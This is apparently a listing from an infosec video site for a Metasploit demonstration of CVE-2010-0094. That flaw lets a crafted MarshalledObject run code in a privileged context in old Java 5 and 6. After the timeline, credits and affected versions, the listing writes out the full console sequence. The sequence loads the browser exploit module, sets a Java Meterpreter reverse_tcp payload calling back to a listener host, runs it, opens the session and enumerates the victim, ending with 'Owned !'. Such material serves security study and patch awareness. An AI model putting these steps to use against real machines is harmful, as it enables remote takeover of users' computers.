Description: Timeline :
Vulnerability reported to Oracle by ZDI the 2009-10-21
Coordinated public release of advisory the 2010-04-05
Metasploit PoC provided by hdm the 2010-09-08
PoC provided by:
Sami Koivu
Matthias Kaiser
egypt
Reference(s) :
CVE-2010-0094
ZDI-10-051
Affected versions :
Java 6 Standard Edition prior to update 19
Java 5 Standard Edition prior to update 23
Tested on Windows XP SP3 with Java 6 Standard Edition Update 18
Description :
This module exploits a vulnerability in the Java Runtime Environment that allows to deserialize a MarshalledObject containing a custom classloader under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.
Metasploit demo :
use multi/browser/java_rmi_connection_impl
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
ipconfig
Owned !
Tags: metasploit , windows , java , hack ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.